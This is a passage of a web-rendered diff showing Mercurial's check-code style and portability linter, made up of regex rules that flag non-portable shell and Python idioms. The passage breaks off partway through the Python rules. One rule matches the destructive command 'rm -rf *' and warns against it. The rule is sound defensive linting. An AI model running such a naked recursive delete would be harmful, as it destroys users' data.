##// END OF EJS Templates
pycompat: export queue module instead of symbols in module (API)...
Gregory Szorc -
r37863:8fb99853 @25 default
parent child Browse files
Show More
@@ -1,741 +1,742 b''
1 #!/usr/bin/env python
1 #!/usr/bin/env python
2 #
2 #
3 # check-code - a style and portability checker for Mercurial
3 # check-code - a style and portability checker for Mercurial
4 #
4 #
5 # Copyright 2010 Matt Mackall <mpm@selenic.com>
5 # Copyright 2010 Matt Mackall <mpm@selenic.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """style and portability checker for Mercurial
10 """style and portability checker for Mercurial
11
11
12 when a rule triggers wrong, do one of the following (prefer one from top):
12 when a rule triggers wrong, do one of the following (prefer one from top):
13 * do the work-around the rule suggests
13 * do the work-around the rule suggests
14 * doublecheck that it is a false match
14 * doublecheck that it is a false match
15 * improve the rule pattern
15 * improve the rule pattern
16 * add an ignore pattern to the rule (3rd arg) which matches your good line
16 * add an ignore pattern to the rule (3rd arg) which matches your good line
17 (you can append a short comment and match this, like: #re-raises)
17 (you can append a short comment and match this, like: #re-raises)
18 * change the pattern to a warning and list the exception in test-check-code-hg
18 * change the pattern to a warning and list the exception in test-check-code-hg
19 * ONLY use no--check-code for skipping entire files from external sources
19 * ONLY use no--check-code for skipping entire files from external sources
20 """
20 """
21
21
22 from __future__ import absolute_import, print_function
22 from __future__ import absolute_import, print_function
23 import glob
23 import glob
24 import keyword
24 import keyword
25 import optparse
25 import optparse
26 import os
26 import os
27 import re
27 import re
28 import sys
28 import sys
29 if sys.version_info[0] < 3:
29 if sys.version_info[0] < 3:
30 opentext = open
30 opentext = open
31 else:
31 else:
32 def opentext(f):
32 def opentext(f):
33 return open(f, encoding='ascii')
33 return open(f, encoding='ascii')
34 try:
34 try:
35 xrange
35 xrange
36 except NameError:
36 except NameError:
37 xrange = range
37 xrange = range
38 try:
38 try:
39 import re2
39 import re2
40 except ImportError:
40 except ImportError:
41 re2 = None
41 re2 = None
42
42
43 def compilere(pat, multiline=False):
43 def compilere(pat, multiline=False):
44 if multiline:
44 if multiline:
45 pat = '(?m)' + pat
45 pat = '(?m)' + pat
46 if re2:
46 if re2:
47 try:
47 try:
48 return re2.compile(pat)
48 return re2.compile(pat)
49 except re2.error:
49 except re2.error:
50 pass
50 pass
51 return re.compile(pat)
51 return re.compile(pat)
52
52
53 # check "rules depending on implementation of repquote()" in each
53 # check "rules depending on implementation of repquote()" in each
54 # patterns (especially pypats), before changing around repquote()
54 # patterns (especially pypats), before changing around repquote()
55 _repquotefixedmap = {' ': ' ', '\n': '\n', '.': 'p', ':': 'q',
55 _repquotefixedmap = {' ': ' ', '\n': '\n', '.': 'p', ':': 'q',
56 '%': '%', '\\': 'b', '*': 'A', '+': 'P', '-': 'M'}
56 '%': '%', '\\': 'b', '*': 'A', '+': 'P', '-': 'M'}
57 def _repquoteencodechr(i):
57 def _repquoteencodechr(i):
58 if i > 255:
58 if i > 255:
59 return 'u'
59 return 'u'
60 c = chr(i)
60 c = chr(i)
61 if c in _repquotefixedmap:
61 if c in _repquotefixedmap:
62 return _repquotefixedmap[c]
62 return _repquotefixedmap[c]
63 if c.isalpha():
63 if c.isalpha():
64 return 'x'
64 return 'x'
65 if c.isdigit():
65 if c.isdigit():
66 return 'n'
66 return 'n'
67 return 'o'
67 return 'o'
68 _repquotett = ''.join(_repquoteencodechr(i) for i in xrange(256))
68 _repquotett = ''.join(_repquoteencodechr(i) for i in xrange(256))
69
69
70 def repquote(m):
70 def repquote(m):
71 t = m.group('text')
71 t = m.group('text')
72 t = t.translate(_repquotett)
72 t = t.translate(_repquotett)
73 return m.group('quote') + t + m.group('quote')
73 return m.group('quote') + t + m.group('quote')
74
74
75 def reppython(m):
75 def reppython(m):
76 comment = m.group('comment')
76 comment = m.group('comment')
77 if comment:
77 if comment:
78 l = len(comment.rstrip())
78 l = len(comment.rstrip())
79 return "#" * l + comment[l:]
79 return "#" * l + comment[l:]
80 return repquote(m)
80 return repquote(m)
81
81
82 def repcomment(m):
82 def repcomment(m):
83 return m.group(1) + "#" * len(m.group(2))
83 return m.group(1) + "#" * len(m.group(2))
84
84
85 def repccomment(m):
85 def repccomment(m):
86 t = re.sub(r"((?<=\n) )|\S", "x", m.group(2))
86 t = re.sub(r"((?<=\n) )|\S", "x", m.group(2))
87 return m.group(1) + t + "*/"
87 return m.group(1) + t + "*/"
88
88
89 def repcallspaces(m):
89 def repcallspaces(m):
90 t = re.sub(r"\n\s+", "\n", m.group(2))
90 t = re.sub(r"\n\s+", "\n", m.group(2))
91 return m.group(1) + t
91 return m.group(1) + t
92
92
93 def repinclude(m):
93 def repinclude(m):
94 return m.group(1) + "<foo>"
94 return m.group(1) + "<foo>"
95
95
96 def rephere(m):
96 def rephere(m):
97 t = re.sub(r"\S", "x", m.group(2))
97 t = re.sub(r"\S", "x", m.group(2))
98 return m.group(1) + t
98 return m.group(1) + t
99
99
100
100
101 testpats = [
101 testpats = [
102 [
102 [
103 (r'\b(push|pop)d\b', "don't use 'pushd' or 'popd', use 'cd'"),
103 (r'\b(push|pop)d\b', "don't use 'pushd' or 'popd', use 'cd'"),
104 (r'\W\$?\(\([^\)\n]*\)\)', "don't use (()) or $(()), use 'expr'"),
104 (r'\W\$?\(\([^\)\n]*\)\)', "don't use (()) or $(()), use 'expr'"),
105 (r'grep.*-q', "don't use 'grep -q', redirect to /dev/null"),
105 (r'grep.*-q', "don't use 'grep -q', redirect to /dev/null"),
106 (r'(?<!hg )grep.* -a', "don't use 'grep -a', use in-line python"),
106 (r'(?<!hg )grep.* -a', "don't use 'grep -a', use in-line python"),
107 (r'sed.*-i', "don't use 'sed -i', use a temporary file"),
107 (r'sed.*-i', "don't use 'sed -i', use a temporary file"),
108 (r'\becho\b.*\\n', "don't use 'echo \\n', use printf"),
108 (r'\becho\b.*\\n', "don't use 'echo \\n', use printf"),
109 (r'echo -n', "don't use 'echo -n', use printf"),
109 (r'echo -n', "don't use 'echo -n', use printf"),
110 (r'(^|\|\s*)\bwc\b[^|]*$\n(?!.*\(re\))', "filter wc output"),
110 (r'(^|\|\s*)\bwc\b[^|]*$\n(?!.*\(re\))', "filter wc output"),
111 (r'head -c', "don't use 'head -c', use 'dd'"),
111 (r'head -c', "don't use 'head -c', use 'dd'"),
112 (r'tail -n', "don't use the '-n' option to tail, just use '-<num>'"),
112 (r'tail -n', "don't use the '-n' option to tail, just use '-<num>'"),
113 (r'sha1sum', "don't use sha1sum, use $TESTDIR/md5sum.py"),
113 (r'sha1sum', "don't use sha1sum, use $TESTDIR/md5sum.py"),
114 (r'\bls\b.*-\w*R', "don't use 'ls -R', use 'find'"),
114 (r'\bls\b.*-\w*R', "don't use 'ls -R', use 'find'"),
115 (r'printf.*[^\\]\\([1-9]|0\d)', r"don't use 'printf \NNN', use Python"),
115 (r'printf.*[^\\]\\([1-9]|0\d)', r"don't use 'printf \NNN', use Python"),
116 (r'printf.*[^\\]\\x', "don't use printf \\x, use Python"),
116 (r'printf.*[^\\]\\x', "don't use printf \\x, use Python"),
117 (r'\$\(.*\)', "don't use $(expr), use `expr`"),
117 (r'\$\(.*\)', "don't use $(expr), use `expr`"),
118 (r'rm -rf \*', "don't use naked rm -rf, target a directory"),
118 (r'rm -rf \*', "don't use naked rm -rf, target a directory"),
119 (r'\[[^\]]+==', '[ foo == bar ] is a bashism, use [ foo = bar ] instead'),
119 (r'\[[^\]]+==', '[ foo == bar ] is a bashism, use [ foo = bar ] instead'),
120 (r'(^|\|\s*)grep (-\w\s+)*[^|]*[(|]\w',
120 (r'(^|\|\s*)grep (-\w\s+)*[^|]*[(|]\w',
121 "use egrep for extended grep syntax"),
121 "use egrep for extended grep syntax"),
122 (r'(^|\|\s*)e?grep .*\\S', "don't use \\S in regular expression"),
122 (r'(^|\|\s*)e?grep .*\\S', "don't use \\S in regular expression"),
123 (r'(?<!!)/bin/', "don't use explicit paths for tools"),
123 (r'(?<!!)/bin/', "don't use explicit paths for tools"),
124 (r'#!.*/bash', "don't use bash in shebang, use sh"),
124 (r'#!.*/bash', "don't use bash in shebang, use sh"),
125 (r'[^\n]\Z', "no trailing newline"),
125 (r'[^\n]\Z', "no trailing newline"),
126 (r'export .*=', "don't export and assign at once"),
126 (r'export .*=', "don't export and assign at once"),
127 (r'^source\b', "don't use 'source', use '.'"),
127 (r'^source\b', "don't use 'source', use '.'"),
128 (r'touch -d', "don't use 'touch -d', use 'touch -t' instead"),
128 (r'touch -d', "don't use 'touch -d', use 'touch -t' instead"),
129 (r'\bls +[^|\n-]+ +-', "options to 'ls' must come before filenames"),
129 (r'\bls +[^|\n-]+ +-', "options to 'ls' must come before filenames"),
130 (r'[^>\n]>\s*\$HGRCPATH', "don't overwrite $HGRCPATH, append to it"),
130 (r'[^>\n]>\s*\$HGRCPATH', "don't overwrite $HGRCPATH, append to it"),
131 (r'^stop\(\)', "don't use 'stop' as a shell function name"),
131 (r'^stop\(\)', "don't use 'stop' as a shell function name"),
132 (r'(\[|\btest\b).*-e ', "don't use 'test -e', use 'test -f'"),
132 (r'(\[|\btest\b).*-e ', "don't use 'test -e', use 'test -f'"),
133 (r'\[\[\s+[^\]]*\]\]', "don't use '[[ ]]', use '[ ]'"),
133 (r'\[\[\s+[^\]]*\]\]', "don't use '[[ ]]', use '[ ]'"),
134 (r'^alias\b.*=', "don't use alias, use a function"),
134 (r'^alias\b.*=', "don't use alias, use a function"),
135 (r'if\s*!', "don't use '!' to negate exit status"),
135 (r'if\s*!', "don't use '!' to negate exit status"),
136 (r'/dev/u?random', "don't use entropy, use /dev/zero"),
136 (r'/dev/u?random', "don't use entropy, use /dev/zero"),
137 (r'do\s*true;\s*done', "don't use true as loop body, use sleep 0"),
137 (r'do\s*true;\s*done', "don't use true as loop body, use sleep 0"),
138 (r'sed (-e )?\'(\d+|/[^/]*/)i(?!\\\n)',
138 (r'sed (-e )?\'(\d+|/[^/]*/)i(?!\\\n)',
139 "put a backslash-escaped newline after sed 'i' command"),
139 "put a backslash-escaped newline after sed 'i' command"),
140 (r'^diff *-\w*[uU].*$\n(^ \$ |^$)', "prefix diff -u/-U with cmp"),
140 (r'^diff *-\w*[uU].*$\n(^ \$ |^$)', "prefix diff -u/-U with cmp"),
141 (r'^\s+(if)? diff *-\w*[uU]', "prefix diff -u/-U with cmp"),
141 (r'^\s+(if)? diff *-\w*[uU]', "prefix diff -u/-U with cmp"),
142 (r'[\s="`\']python\s(?!bindings)', "don't use 'python', use '$PYTHON'"),
142 (r'[\s="`\']python\s(?!bindings)', "don't use 'python', use '$PYTHON'"),
143 (r'seq ', "don't use 'seq', use $TESTDIR/seq.py"),
143 (r'seq ', "don't use 'seq', use $TESTDIR/seq.py"),
144 (r'\butil\.Abort\b', "directly use error.Abort"),
144 (r'\butil\.Abort\b', "directly use error.Abort"),
145 (r'\|&', "don't use |&, use 2>&1"),
145 (r'\|&', "don't use |&, use 2>&1"),
146 (r'\w = +\w', "only one space after = allowed"),
146 (r'\w = +\w', "only one space after = allowed"),
147 (r'\bsed\b.*[^\\]\\n', "don't use 'sed ... \\n', use a \\ and a newline"),
147 (r'\bsed\b.*[^\\]\\n', "don't use 'sed ... \\n', use a \\ and a newline"),
148 (r'env.*-u', "don't use 'env -u VAR', use 'unset VAR'"),
148 (r'env.*-u', "don't use 'env -u VAR', use 'unset VAR'"),
149 (r'cp.* -r ', "don't use 'cp -r', use 'cp -R'"),
149 (r'cp.* -r ', "don't use 'cp -r', use 'cp -R'"),
150 (r'grep.* -[ABC]', "don't use grep's context flags"),
150 (r'grep.* -[ABC]', "don't use grep's context flags"),
151 (r'find.*-printf',
151 (r'find.*-printf',
152 "don't use 'find -printf', it doesn't exist on BSD find(1)"),
152 "don't use 'find -printf', it doesn't exist on BSD find(1)"),
153 (r'\$RANDOM ', "don't use bash-only $RANDOM to generate random values"),
153 (r'\$RANDOM ', "don't use bash-only $RANDOM to generate random values"),
154 ],
154 ],
155 # warnings
155 # warnings
156 [
156 [
157 (r'^function', "don't use 'function', use old style"),
157 (r'^function', "don't use 'function', use old style"),
158 (r'^diff.*-\w*N', "don't use 'diff -N'"),
158 (r'^diff.*-\w*N', "don't use 'diff -N'"),
159 (r'\$PWD|\${PWD}', "don't use $PWD, use `pwd`"),
159 (r'\$PWD|\${PWD}', "don't use $PWD, use `pwd`"),
160 (r'^([^"\'\n]|("[^"\n]*")|(\'[^\'\n]*\'))*\^', "^ must be quoted"),
160 (r'^([^"\'\n]|("[^"\n]*")|(\'[^\'\n]*\'))*\^', "^ must be quoted"),
161 (r'kill (`|\$\()', "don't use kill, use killdaemons.py")
161 (r'kill (`|\$\()', "don't use kill, use killdaemons.py")
162 ]
162 ]
163 ]
163 ]
164
164
165 testfilters = [
165 testfilters = [
166 (r"( *)(#([^!][^\n]*\S)?)", repcomment),
166 (r"( *)(#([^!][^\n]*\S)?)", repcomment),
167 (r"<<(\S+)((.|\n)*?\n\1)", rephere),
167 (r"<<(\S+)((.|\n)*?\n\1)", rephere),
168 ]
168 ]
169
169
170 uprefix = r"^ \$ "
170 uprefix = r"^ \$ "
171 utestpats = [
171 utestpats = [
172 [
172 [
173 (r'^(\S.*|| [$>] \S.*)[ \t]\n', "trailing whitespace on non-output"),
173 (r'^(\S.*|| [$>] \S.*)[ \t]\n', "trailing whitespace on non-output"),
174 (uprefix + r'.*\|\s*sed[^|>\n]*\n',
174 (uprefix + r'.*\|\s*sed[^|>\n]*\n',
175 "use regex test output patterns instead of sed"),
175 "use regex test output patterns instead of sed"),
176 (uprefix + r'(true|exit 0)', "explicit zero exit unnecessary"),
176 (uprefix + r'(true|exit 0)', "explicit zero exit unnecessary"),
177 (uprefix + r'.*(?<!\[)\$\?', "explicit exit code checks unnecessary"),
177 (uprefix + r'.*(?<!\[)\$\?', "explicit exit code checks unnecessary"),
178 (uprefix + r'.*\|\| echo.*(fail|error)',
178 (uprefix + r'.*\|\| echo.*(fail|error)',
179 "explicit exit code checks unnecessary"),
179 "explicit exit code checks unnecessary"),
180 (uprefix + r'set -e', "don't use set -e"),
180 (uprefix + r'set -e', "don't use set -e"),
181 (uprefix + r'(\s|fi\b|done\b)', "use > for continued lines"),
181 (uprefix + r'(\s|fi\b|done\b)', "use > for continued lines"),
182 (uprefix + r'.*:\.\S*/', "x:.y in a path does not work on msys, rewrite "
182 (uprefix + r'.*:\.\S*/', "x:.y in a path does not work on msys, rewrite "
183 "as x://.y, or see `hg log -k msys` for alternatives", r'-\S+:\.|' #-Rxxx
183 "as x://.y, or see `hg log -k msys` for alternatives", r'-\S+:\.|' #-Rxxx
184 '# no-msys'), # in test-pull.t which is skipped on windows
184 '# no-msys'), # in test-pull.t which is skipped on windows
185 (r'^ [^$>].*27\.0\.0\.1',
185 (r'^ [^$>].*27\.0\.0\.1',
186 'use $LOCALIP not an explicit loopback address'),
186 'use $LOCALIP not an explicit loopback address'),
187 (r'^ (?![>$] ).*\$LOCALIP.*[^)]$',
187 (r'^ (?![>$] ).*\$LOCALIP.*[^)]$',
188 'mark $LOCALIP output lines with (glob) to help tests in BSD jails'),
188 'mark $LOCALIP output lines with (glob) to help tests in BSD jails'),
189 (r'^ (cat|find): .*: \$ENOENT\$',
189 (r'^ (cat|find): .*: \$ENOENT\$',
190 'use test -f to test for file existence'),
190 'use test -f to test for file existence'),
191 (r'^ diff -[^ -]*p',
191 (r'^ diff -[^ -]*p',
192 "don't use (external) diff with -p for portability"),
192 "don't use (external) diff with -p for portability"),
193 (r' readlink ', 'use readlink.py instead of readlink'),
193 (r' readlink ', 'use readlink.py instead of readlink'),
194 (r'^ [-+][-+][-+] .* [-+]0000 \(glob\)',
194 (r'^ [-+][-+][-+] .* [-+]0000 \(glob\)',
195 "glob timezone field in diff output for portability"),
195 "glob timezone field in diff output for portability"),
196 (r'^ @@ -[0-9]+ [+][0-9]+,[0-9]+ @@',
196 (r'^ @@ -[0-9]+ [+][0-9]+,[0-9]+ @@',
197 "use '@@ -N* +N,n @@ (glob)' style chunk header for portability"),
197 "use '@@ -N* +N,n @@ (glob)' style chunk header for portability"),
198 (r'^ @@ -[0-9]+,[0-9]+ [+][0-9]+ @@',
198 (r'^ @@ -[0-9]+,[0-9]+ [+][0-9]+ @@',
199 "use '@@ -N,n +N* @@ (glob)' style chunk header for portability"),
199 "use '@@ -N,n +N* @@ (glob)' style chunk header for portability"),
200 (r'^ @@ -[0-9]+ [+][0-9]+ @@',
200 (r'^ @@ -[0-9]+ [+][0-9]+ @@',
201 "use '@@ -N* +N* @@ (glob)' style chunk header for portability"),
201 "use '@@ -N* +N* @@ (glob)' style chunk header for portability"),
202 (uprefix + r'hg( +-[^ ]+( +[^ ]+)?)* +extdiff'
202 (uprefix + r'hg( +-[^ ]+( +[^ ]+)?)* +extdiff'
203 r'( +(-[^ po-]+|--(?!program|option)[^ ]+|[^-][^ ]*))*$',
203 r'( +(-[^ po-]+|--(?!program|option)[^ ]+|[^-][^ ]*))*$',
204 "use $RUNTESTDIR/pdiff via extdiff (or -o/-p for false-positives)"),
204 "use $RUNTESTDIR/pdiff via extdiff (or -o/-p for false-positives)"),
205 ],
205 ],
206 # warnings
206 # warnings
207 [
207 [
208 (r'^ (?!.*\$LOCALIP)[^*?/\n]* \(glob\)$',
208 (r'^ (?!.*\$LOCALIP)[^*?/\n]* \(glob\)$',
209 "glob match with no glob string (?, *, /, and $LOCALIP)"),
209 "glob match with no glob string (?, *, /, and $LOCALIP)"),
210 ]
210 ]
211 ]
211 ]
212
212
213 # transform plain test rules to unified test's
213 # transform plain test rules to unified test's
214 for i in [0, 1]:
214 for i in [0, 1]:
215 for tp in testpats[i]:
215 for tp in testpats[i]:
216 p = tp[0]
216 p = tp[0]
217 m = tp[1]
217 m = tp[1]
218 if p.startswith(r'^'):
218 if p.startswith(r'^'):
219 p = r"^ [$>] (%s)" % p[1:]
219 p = r"^ [$>] (%s)" % p[1:]
220 else:
220 else:
221 p = r"^ [$>] .*(%s)" % p
221 p = r"^ [$>] .*(%s)" % p
222 utestpats[i].append((p, m) + tp[2:])
222 utestpats[i].append((p, m) + tp[2:])
223
223
224 # don't transform the following rules:
224 # don't transform the following rules:
225 # " > \t" and " \t" should be allowed in unified tests
225 # " > \t" and " \t" should be allowed in unified tests
226 testpats[0].append((r'^( *)\t', "don't use tabs to indent"))
226 testpats[0].append((r'^( *)\t', "don't use tabs to indent"))
227 utestpats[0].append((r'^( ?)\t', "don't use tabs to indent"))
227 utestpats[0].append((r'^( ?)\t', "don't use tabs to indent"))
228
228
229 utestfilters = [
229 utestfilters = [
230 (r"<<(\S+)((.|\n)*?\n > \1)", rephere),
230 (r"<<(\S+)((.|\n)*?\n > \1)", rephere),
231 (r"( +)(#([^!][^\n]*\S)?)", repcomment),
231 (r"( +)(#([^!][^\n]*\S)?)", repcomment),
232 ]
232 ]
233
233
234 pypats = [
234 pypats = [
235 [
235 [
236 (r'^\s*def\s*\w+\s*\(.*,\s*\(',
236 (r'^\s*def\s*\w+\s*\(.*,\s*\(',
237 "tuple parameter unpacking not available in Python 3+"),
237 "tuple parameter unpacking not available in Python 3+"),
238 (r'lambda\s*\(.*,.*\)',
238 (r'lambda\s*\(.*,.*\)',
239 "tuple parameter unpacking not available in Python 3+"),
239 "tuple parameter unpacking not available in Python 3+"),
240 (r'(?<!def)\s+(cmp)\(', "cmp is not available in Python 3+"),
240 (r'(?<!def)\s+(cmp)\(', "cmp is not available in Python 3+"),
241 (r'(?<!\.)\breduce\s*\(.*', "reduce is not available in Python 3+"),
241 (r'(?<!\.)\breduce\s*\(.*', "reduce is not available in Python 3+"),
242 (r'\bdict\(.*=', 'dict() is different in Py2 and 3 and is slower than {}',
242 (r'\bdict\(.*=', 'dict() is different in Py2 and 3 and is slower than {}',
243 'dict-from-generator'),
243 'dict-from-generator'),
244 (r'\.has_key\b', "dict.has_key is not available in Python 3+"),
244 (r'\.has_key\b', "dict.has_key is not available in Python 3+"),
245 (r'\s<>\s', '<> operator is not available in Python 3+, use !='),
245 (r'\s<>\s', '<> operator is not available in Python 3+, use !='),
246 (r'^\s*\t', "don't use tabs"),
246 (r'^\s*\t', "don't use tabs"),
247 (r'\S;\s*\n', "semicolon"),
247 (r'\S;\s*\n', "semicolon"),
248 (r'[^_]_\([ \t\n]*(?:"[^"]+"[ \t\n+]*)+%', "don't use % inside _()"),
248 (r'[^_]_\([ \t\n]*(?:"[^"]+"[ \t\n+]*)+%', "don't use % inside _()"),
249 (r"[^_]_\([ \t\n]*(?:'[^']+'[ \t\n+]*)+%", "don't use % inside _()"),
249 (r"[^_]_\([ \t\n]*(?:'[^']+'[ \t\n+]*)+%", "don't use % inside _()"),
250 (r'(\w|\)),\w', "missing whitespace after ,"),
250 (r'(\w|\)),\w', "missing whitespace after ,"),
251 (r'(\w|\))[+/*\-<>]\w', "missing whitespace in expression"),
251 (r'(\w|\))[+/*\-<>]\w', "missing whitespace in expression"),
252 (r'^\s+(\w|\.)+=\w[^,()\n]*$', "missing whitespace in assignment"),
252 (r'^\s+(\w|\.)+=\w[^,()\n]*$', "missing whitespace in assignment"),
253 (r'\w\s=\s\s+\w', "gratuitous whitespace after ="),
253 (r'\w\s=\s\s+\w', "gratuitous whitespace after ="),
254 ((
254 ((
255 # a line ending with a colon, potentially with trailing comments
255 # a line ending with a colon, potentially with trailing comments
256 r':([ \t]*#[^\n]*)?\n'
256 r':([ \t]*#[^\n]*)?\n'
257 # one that is not a pass and not only a comment
257 # one that is not a pass and not only a comment
258 r'(?P<indent>[ \t]+)[^#][^\n]+\n'
258 r'(?P<indent>[ \t]+)[^#][^\n]+\n'
259 # more lines at the same indent level
259 # more lines at the same indent level
260 r'((?P=indent)[^\n]+\n)*'
260 r'((?P=indent)[^\n]+\n)*'
261 # a pass at the same indent level, which is bogus
261 # a pass at the same indent level, which is bogus
262 r'(?P=indent)pass[ \t\n#]'
262 r'(?P=indent)pass[ \t\n#]'
263 ), 'omit superfluous pass'),
263 ), 'omit superfluous pass'),
264 (r'.{81}', "line too long"),
264 (r'.{81}', "line too long"),
265 (r'[^\n]\Z', "no trailing newline"),
265 (r'[^\n]\Z', "no trailing newline"),
266 (r'(\S[ \t]+|^[ \t]+)\n', "trailing whitespace"),
266 (r'(\S[ \t]+|^[ \t]+)\n', "trailing whitespace"),
267 # (r'^\s+[^_ \n][^_. \n]+_[^_\n]+\s*=',
267 # (r'^\s+[^_ \n][^_. \n]+_[^_\n]+\s*=',
268 # "don't use underbars in identifiers"),
268 # "don't use underbars in identifiers"),
269 (r'^\s+(self\.)?[A-Za-z][a-z0-9]+[A-Z]\w* = ',
269 (r'^\s+(self\.)?[A-Za-z][a-z0-9]+[A-Z]\w* = ',
270 "don't use camelcase in identifiers", r'#.*camelcase-required'),
270 "don't use camelcase in identifiers", r'#.*camelcase-required'),
271 (r'^\s*(if|while|def|class|except|try)\s[^[\n]*:\s*[^\\n]#\s]+',
271 (r'^\s*(if|while|def|class|except|try)\s[^[\n]*:\s*[^\\n]#\s]+',
272 "linebreak after :"),
272 "linebreak after :"),
273 (r'class\s[^( \n]+:', "old-style class, use class foo(object)",
273 (r'class\s[^( \n]+:', "old-style class, use class foo(object)",
274 r'#.*old-style'),
274 r'#.*old-style'),
275 (r'class\s[^( \n]+\(\):',
275 (r'class\s[^( \n]+\(\):',
276 "class foo() creates old style object, use class foo(object)",
276 "class foo() creates old style object, use class foo(object)",
277 r'#.*old-style'),
277 r'#.*old-style'),
278 (r'\b(%s)\(' % '|'.join(k for k in keyword.kwlist
278 (r'\b(%s)\(' % '|'.join(k for k in keyword.kwlist
279 if k not in ('print', 'exec')),
279 if k not in ('print', 'exec')),
280 "Python keyword is not a function"),
280 "Python keyword is not a function"),
281 (r',]', "unneeded trailing ',' in list"),
281 (r',]', "unneeded trailing ',' in list"),
282 # (r'class\s[A-Z][^\(]*\((?!Exception)',
282 # (r'class\s[A-Z][^\(]*\((?!Exception)',
283 # "don't capitalize non-exception classes"),
283 # "don't capitalize non-exception classes"),
284 # (r'in range\(', "use xrange"),
284 # (r'in range\(', "use xrange"),
285 # (r'^\s*print\s+', "avoid using print in core and extensions"),
285 # (r'^\s*print\s+', "avoid using print in core and extensions"),
286 (r'[\x80-\xff]', "non-ASCII character literal"),
286 (r'[\x80-\xff]', "non-ASCII character literal"),
287 (r'("\')\.format\(', "str.format() has no bytes counterpart, use %"),
287 (r'("\')\.format\(', "str.format() has no bytes counterpart, use %"),
288 (r'^\s*(%s)\s\s' % '|'.join(keyword.kwlist),
288 (r'^\s*(%s)\s\s' % '|'.join(keyword.kwlist),
289 "gratuitous whitespace after Python keyword"),
289 "gratuitous whitespace after Python keyword"),
290 (r'([\(\[][ \t]\S)|(\S[ \t][\)\]])', "gratuitous whitespace in () or []"),
290 (r'([\(\[][ \t]\S)|(\S[ \t][\)\]])', "gratuitous whitespace in () or []"),
291 # (r'\s\s=', "gratuitous whitespace before ="),
291 # (r'\s\s=', "gratuitous whitespace before ="),
292 (r'[^>< ](\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\S',
292 (r'[^>< ](\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\S',
293 "missing whitespace around operator"),
293 "missing whitespace around operator"),
294 (r'[^>< ](\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\s',
294 (r'[^>< ](\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\s',
295 "missing whitespace around operator"),
295 "missing whitespace around operator"),
296 (r'\s(\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\S',
296 (r'\s(\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\S',
297 "missing whitespace around operator"),
297 "missing whitespace around operator"),
298 (r'[^^+=*/!<>&| %-](\s=|=\s)[^= ]',
298 (r'[^^+=*/!<>&| %-](\s=|=\s)[^= ]',
299 "wrong whitespace around ="),
299 "wrong whitespace around ="),
300 (r'\([^()]*( =[^=]|[^<>!=]= )',
300 (r'\([^()]*( =[^=]|[^<>!=]= )',
301 "no whitespace around = for named parameters"),
301 "no whitespace around = for named parameters"),
302 (r'raise Exception', "don't raise generic exceptions"),
302 (r'raise Exception', "don't raise generic exceptions"),
303 (r'raise [^,(]+, (\([^\)]+\)|[^,\(\)]+)$',
303 (r'raise [^,(]+, (\([^\)]+\)|[^,\(\)]+)$',
304 "don't use old-style two-argument raise, use Exception(message)"),
304 "don't use old-style two-argument raise, use Exception(message)"),
305 (r' is\s+(not\s+)?["\'0-9-]', "object comparison with literal"),
305 (r' is\s+(not\s+)?["\'0-9-]', "object comparison with literal"),
306 (r' [=!]=\s+(True|False|None)',
306 (r' [=!]=\s+(True|False|None)',
307 "comparison with singleton, use 'is' or 'is not' instead"),
307 "comparison with singleton, use 'is' or 'is not' instead"),
308 (r'^\s*(while|if) [01]:',
308 (r'^\s*(while|if) [01]:',
309 "use True/False for constant Boolean expression"),
309 "use True/False for constant Boolean expression"),
310 (r'^\s*if False(:| +and)', 'Remove code instead of using `if False`'),
310 (r'^\s*if False(:| +and)', 'Remove code instead of using `if False`'),
311 (r'(?:(?<!def)\s+|\()hasattr\(',
311 (r'(?:(?<!def)\s+|\()hasattr\(',
312 'hasattr(foo, bar) is broken on py2, use util.safehasattr(foo, bar) '
312 'hasattr(foo, bar) is broken on py2, use util.safehasattr(foo, bar) '
313 'instead', r'#.*hasattr-py3-only'),
313 'instead', r'#.*hasattr-py3-only'),
314 (r'opener\([^)]*\).read\(',
314 (r'opener\([^)]*\).read\(',
315 "use opener.read() instead"),
315 "use opener.read() instead"),
316 (r'opener\([^)]*\).write\(',
316 (r'opener\([^)]*\).write\(',
317 "use opener.write() instead"),
317 "use opener.write() instead"),
318 (r'[\s\(](open|file)\([^)]*\)\.read\(',
318 (r'[\s\(](open|file)\([^)]*\)\.read\(',
319 "use util.readfile() instead"),
319 "use util.readfile() instead"),
320 (r'[\s\(](open|file)\([^)]*\)\.write\(',
320 (r'[\s\(](open|file)\([^)]*\)\.write\(',
321 "use util.writefile() instead"),
321 "use util.writefile() instead"),
322 (r'^[\s\(]*(open(er)?|file)\([^)]*\)(?!\.close\(\))',
322 (r'^[\s\(]*(open(er)?|file)\([^)]*\)(?!\.close\(\))',
323 "always assign an opened file to a variable, and close it afterwards"),
323 "always assign an opened file to a variable, and close it afterwards"),
324 (r'[\s\(](open|file)\([^)]*\)\.(?!close\(\))',
324 (r'[\s\(](open|file)\([^)]*\)\.(?!close\(\))',
325 "always assign an opened file to a variable, and close it afterwards"),
325 "always assign an opened file to a variable, and close it afterwards"),
326 (r'(?i)descend[e]nt', "the proper spelling is descendAnt"),
326 (r'(?i)descend[e]nt', "the proper spelling is descendAnt"),
327 (r'\.debug\(\_', "don't mark debug messages for translation"),
327 (r'\.debug\(\_', "don't mark debug messages for translation"),
328 (r'\.strip\(\)\.split\(\)', "no need to strip before splitting"),
328 (r'\.strip\(\)\.split\(\)', "no need to strip before splitting"),
329 (r'^\s*except\s*:', "naked except clause", r'#.*re-raises'),
329 (r'^\s*except\s*:', "naked except clause", r'#.*re-raises'),
330 (r'^\s*except\s([^\(,]+|\([^\)]+\))\s*,',
330 (r'^\s*except\s([^\(,]+|\([^\)]+\))\s*,',
331 'legacy exception syntax; use "as" instead of ","'),
331 'legacy exception syntax; use "as" instead of ","'),
332 (r':\n( )*( ){1,3}[^ ]', "must indent 4 spaces"),
332 (r':\n( )*( ){1,3}[^ ]', "must indent 4 spaces"),
333 (r'release\(.*wlock, .*lock\)', "wrong lock release order"),
333 (r'release\(.*wlock, .*lock\)', "wrong lock release order"),
334 (r'\bdef\s+__bool__\b', "__bool__ should be __nonzero__ in Python 2"),
